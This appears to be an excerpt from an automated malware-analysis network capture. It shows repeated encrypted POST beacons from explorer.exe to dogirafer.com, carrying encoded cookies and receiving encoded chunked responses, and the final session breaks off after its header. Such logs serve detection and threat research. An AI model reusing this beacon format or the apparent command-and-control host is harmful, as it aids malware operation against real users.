Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50025	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:02 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnawqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:03 UTC	789	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W3%2FJAKybYRht2%2Fd5MiTjcO%2FxmsavA0naqJmurpKDWfC1n84DI%2BZOOe0M6z8kfsmD5417AkazQgsT518lifeFGgJNwSyTnWI2t3Nw%2BIH975JIaKthcJq3h0Ovx%2Fg0YcEY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec507d22d9542ec-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1605&rtt_var=617&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1750599&cwnd=183&unsent_bytes=0&cid=0d506a1fdc94d059&ts=1625&x=0"
2024-12-03 16:46:03 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 53 71 64 52 38 75 32 33 6f 70 6c 5a 42 6e 66 67 47 37 6f 67 33 46 4e 4f 30 76 57 41 69 50 43 5a 2f 61 37 76 53 62 50 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 52 6e 4a 6b 59 73 65 4a 71 4f 68 31 6b 6e 44 37 57 39 75 65 30 49 74 4a 61 73 70 63 73 37 67 69 6c 58 48 6d 70 49 36 73 50 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 4d 30 30 41 2b 6e 6b 4b 58 4d 53 62 72 58 45 65 48 41 6c 71 34 35 48 37 6c 4c 56 43 68 45 70 67 45 30 2f 4e 31 34 4a 4f 4d 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 52 52 52 4a Data Ascii: 150PSqdR8u23oplZBnfgG7og3FNO0vWAiPCZ/a7vSbPKRib7xuPoA21j4bUizRnJkYseJqOh1knD7W9ue0ItJaspcs7gilXHmpI6sPsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EM00A+nkKXMSbrXEeHAlq45H7lLVChEpgE0/N14JOMC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfRRRJ
2024-12-03 16:46:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50029	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:05 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:07 UTC	779	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QmbjzkdPrMr1svCLiSupweT8e6H2VAYfL8Y38OdeJXNkMea63tnxYGTMif590s7RBOdc0NMGZSCVBqNi83YVxSAUgJlotImYfWNAqttaXwASvxUd1rNITr6mT%2FJqF1kP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec507e72cf34289-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1618&rtt_var=628&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1804697&cwnd=145&unsent_bytes=0&cid=be377aa860238dd7&ts=1605&x=0"
2024-12-03 16:46:07 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 79 53 5a 51 4d 65 78 33 49 70 6b 5a 52 2f 63 6a 47 48 68 67 33 46 49 4f 6b 4c 57 42 43 50 43 62 76 6d 79 76 43 62 4d 5a 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 4a 55 55 6a 63 70 4b 4f 68 56 38 67 44 72 71 2f 74 2b 30 43 73 4a 57 71 70 63 39 52 35 43 4e 58 47 47 4a 4a 36 34 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 4b 46 38 38 30 42 4f 2f 6a 54 68 38 54 5a 62 4c 42 65 6e 52 68 35 49 4a 50 37 56 54 56 44 33 5a 4f 67 6b 34 39 4f 46 77 42 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 76 46 53 54 70 Data Ascii: 150PySZQMex3IpkZR/cjGHhg3FIOkLWBCPCbvmyvCbMZWmcphSGpB6yiJiVjA1mJUUjcpKOhV8gDrq/t+0CsJWqpc9R5CNXGGJJ64+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzKF880BO/jTh8TZbLBenRh5IJP7VTVD3ZOgk49OFwBcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZOvFSTp
2024-12-03 16:46:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50030	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:08 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkYwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:10 UTC	779	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oj8MgmMLXQ5nmiLoqvIYzKQEUWf5LrhOyjlmopYw6YfqUaus852q3m9MM6PBFWzFtwlzZnML9oPcbA76rfK3PnphnobNOmZejIIX3%2FsGeHLaWjCfRAF8CzVqAMMMkwgh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec507fa3f3ef5fa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1531&min_rtt=1510&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1737061&cwnd=252&unsent_bytes=0&cid=ae04fac05b03da14&ts=1687&x=0"
2024-12-03 16:46:10 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 43 53 62 51 63 57 30 30 49 70 76 5a 68 72 65 68 32 43 73 79 6e 64 50 4f 55 6e 56 42 6b 36 73 61 2f 6d 78 76 79 65 41 57 42 2f 53 34 42 4b 4c 73 77 71 79 6b 63 66 54 74 54 35 76 4a 45 49 71 66 2f 7a 6f 68 6c 30 6e 44 4c 4b 2f 2f 61 59 4d 74 35 47 71 72 63 68 52 35 43 42 55 47 6d 56 50 37 6f 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 4b 45 4d 67 32 42 2b 76 68 54 68 6f 56 61 62 37 43 65 6e 46 68 35 49 5a 48 37 56 76 66 44 58 5a 41 69 30 45 36 4e 46 6f 4c 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 66 42 58 52 70 Data Ascii: 150OCSbQcW00IpvZhreh2CsyndPOUnVBk6sa/mxvyeAWB/S4BKLswqykcfTtT5vJEIqf/zohl0nDLK//aYMt5GqrchR5CBUGmVP7o+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzKEMg2B+vhThoVab7CenFh5IZH7VvfDXZAi0E6NFoLcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZOfBXRp
2024-12-03 16:46:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50031	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:11 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkYgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:13 UTC	788	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MEchLOFOUAsWtMdkJ%2Fkmud7UTSZZPgA1%2F5p5LxM3Lv2V0bQlcNamkmc%2B7296DMHlJzuE9l5SOU0tL3N8H9Amx%2BLxtdeAawUQxumkPWBrryFPjXajmePe7hupRUFjq%2F6n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec5080d2853de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4115&min_rtt=1573&rtt_var=2260&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1856325&cwnd=230&unsent_bytes=0&cid=da016690c6f455cf&ts=1442&x=0"
2024-12-03 16:46:13 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 43 79 55 52 38 71 32 74 75 52 6b 59 42 6e 62 6a 57 4b 73 7a 6e 64 50 4d 30 2f 54 41 55 36 73 61 2f 75 79 75 43 44 4d 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 35 73 4c 6b 4d 72 63 35 75 4f 67 46 6f 68 43 72 71 38 74 75 30 44 74 35 43 6d 6f 63 67 39 67 69 6c 57 48 47 5a 4f 37 63 72 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 63 45 34 41 75 2f 6d 4a 33 4d 58 62 4c 37 44 65 58 51 6c 71 34 4e 41 37 46 54 66 41 52 6f 70 68 6b 41 34 4d 6c 67 42 50 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 4a 57 51 4a Data Ascii: 150OCyUR8q2tuRkYBnbjWKszndPM0/TAU6sa/uyuCDMKRib7xuPoA21j4bUiz5sLkMrc5uOgFohCrq8tu0Dt5Cmocg9gilWHGZO7crsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4FcE4Au/mJ3MXbL7DeXQlq4NA7FTfARophkA4MlgBPsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfJWQJ
2024-12-03 16:46:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50032	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:14 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkYQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:15 UTC	791	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MAEfbb%2FUgAUeb6WG%2FaDnt6ChMMd8yeSY2USxKjjKY2nqkl7Gj12DvMvP%2Fd%2FnKQ%2BIMZ1uN4%2BrwWFXZbqTnDG7pxNhog8c63lYSk2ZJd66sbK%2BLNXD6ujDrocUTyZOifE2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec5081ea90543dd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1663&rtt_var=653&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1638608&cwnd=196&unsent_bytes=0&cid=7d3aa0c2c9f6bb9a&ts=1411&x=0"
2024-12-03 16:46:15 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 53 32 59 51 73 57 78 32 49 70 6c 61 78 6a 5a 67 6d 37 67 67 33 64 4a 50 6b 33 66 41 53 62 43 61 50 75 7a 76 43 65 41 57 42 2f 53 34 42 4b 4c 73 77 71 79 6b 63 66 54 73 6a 46 75 4c 6b 4d 70 66 50 7a 70 67 56 38 72 44 37 71 35 2f 61 55 49 73 5a 53 73 6f 73 31 52 36 69 46 52 47 57 46 50 37 34 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 45 45 73 38 30 42 2b 2f 6c 54 68 51 53 61 72 2f 49 63 33 46 68 34 59 46 50 36 6c 4c 5a 44 58 5a 48 67 55 34 37 4e 46 70 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 68 4f 50 64 52 51 70 Data Ascii: 150OS2YQsWx2IplaxjZgm7gg3dJPk3fASbCaPuzvCeAWB/S4BKLswqykcfTsjFuLkMpfPzpgV8rD7q5/aUIsZSsos1R6iFRGWFP74+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzEEs80B+/lThQSar/Ic3Fh4YFP6lLZDXZHgU47NFpEA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbhOPdRQp
2024-12-03 16:46:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50033	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:17 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkYAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:18 UTC	783	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cm5obXRDuYf6xfSmnZ4jC4BXXZkiOGXPCBm0C162jmm51lHIuI26Be5Vxe7VeCNCNQbex3QZqLcwOU6UK7UNSM4qsFPB0T%2BjJkp9i4Jd7HbakY%2BY%2BES0rdJEvU67gpwL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec5082ffe9f7ca5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1761&rtt_var=685&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1569048&cwnd=242&unsent_bytes=0&cid=c913668be4adf778&ts=1627&x=0"
2024-12-03 16:46:18 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 79 57 5a 54 4d 71 37 32 49 70 69 5a 68 72 51 68 47 62 6f 67 33 56 4b 4f 55 2f 53 41 53 48 43 61 2f 2b 78 76 53 4c 4c 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 4a 45 63 71 65 70 58 70 37 46 73 67 44 62 53 33 73 4b 46 47 75 35 4b 70 72 63 38 36 36 55 35 54 48 47 70 46 36 73 4f 68 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 38 77 42 4f 37 71 49 78 31 2b 61 72 48 45 65 48 6b 6f 37 38 74 50 37 6c 4c 64 43 52 46 4f 37 45 34 2b 4d 31 6f 4a 4e 6f 7a 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 62 51 5a Data Ascii: 150OyWZTMq72IpiZhrQhGbog3VKOU/SASHCa/+xvSLLZmmcphSGpB6yiJiVjA1mJEcqepXp7FsgDbS3sKFGu5Kprc866U5THGpF6sOhfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc8wBO7qIx1+arHEeHko78tP7lLdCRFO7E4+M1oJNozMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1bQZ
2024-12-03 16:46:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50034	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:20 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkZwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:22 UTC	781	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HrEpT2g3sTm%2BYJCuX2XCr2lV8yDXL2rFjadoUeU4wW0GxicFhlMJBSRjErN69%2BSpCeLJ6RK7FVTkn6w6vdpVEBcWGVz2jULRRYz41PMPIxP0YgQEs0q317PGru2ZiCh8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec50845ec9572ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1794&rtt_var=705&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1518460&cwnd=228&unsent_bytes=0&cid=ad999ba432ac9201&ts=1596&x=0"
2024-12-03 16:46:22 UTC	347	IN	Data Raw: 31 35 34 0d 0a 4d 79 79 62 51 38 61 37 32 6f 70 67 5a 78 6a 59 67 6d 48 70 67 33 4a 49 50 55 7a 52 42 53 48 43 61 66 36 30 76 43 44 4a 5a 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6e 4c 30 59 6a 65 4a 62 6b 37 46 59 67 43 37 4b 33 73 61 4e 47 74 4a 65 74 6f 4d 67 37 36 45 35 56 47 32 5a 4f 37 38 75 6e 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 38 31 44 4f 7a 67 4a 78 6c 2b 61 37 62 44 65 6e 45 73 34 63 74 46 36 56 50 63 43 78 6c 42 37 45 30 2f 4d 46 67 49 4e 34 2f 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 61 52 5a Data Ascii: 154MyybQ8a72opgZxjYgmHpg3JIPUzRBSHCaf60vCDJZGmcphSGpB6yiJiVjA1nL0YjeJbk7FYgC7K3saNGtJetoMg76E5VG2ZO78unfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc81DOzgJxl+a7bDenEs4ctF6VPcCxlB7E0/MFgIN4/MfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1aRZ
2024-12-03 16:46:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50035	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:23 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkZgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:25 UTC	779	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dvab0nqMTHUBnTao14tXg0S4S22u8lOgJkDWrCmM67ArKcaUyonZizj3yHUDKBLmQmGFIgrkt9RDAlzFPsNlC2pfdSPnU2Bel%2FOJ9arIX0urJjsVnEGBLzJ6yeF3432V"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec50858698c0f79-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1547&min_rtt=1519&rtt_var=589&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1922317&cwnd=241&unsent_bytes=0&cid=68f12b03fa80e1b9&ts=1421&x=0"
2024-12-03 16:46:25 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 43 53 56 52 38 53 31 33 59 70 68 5a 68 33 61 68 32 43 73 79 33 35 49 50 6b 6e 52 41 55 36 71 61 76 65 33 74 79 48 4d 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 39 70 4a 6b 34 74 63 70 53 4f 67 6c 6f 6b 43 62 47 39 74 4f 30 49 73 4a 65 6f 70 63 38 35 67 69 6c 54 47 47 46 50 37 38 48 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 63 30 79 44 4f 4c 6a 49 58 4d 57 62 4c 54 41 63 33 67 72 71 34 35 42 37 56 76 66 41 42 41 70 67 55 6f 30 4e 56 6f 4f 50 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 4a 53 54 70 Data Ascii: 150PCSVR8S13YphZh3ah2Csy35IPknRAU6qave3tyHMKRib7xuPoA21j4bUiz9pJk4tcpSOglokCbG9tO0IsJeopc85gilTGGFP78HsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4Fc0yDOLjIXMWbLTAc3grq45B7VvfABApgUo0NVoOPsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfJSTp
2024-12-03 16:46:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50036	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
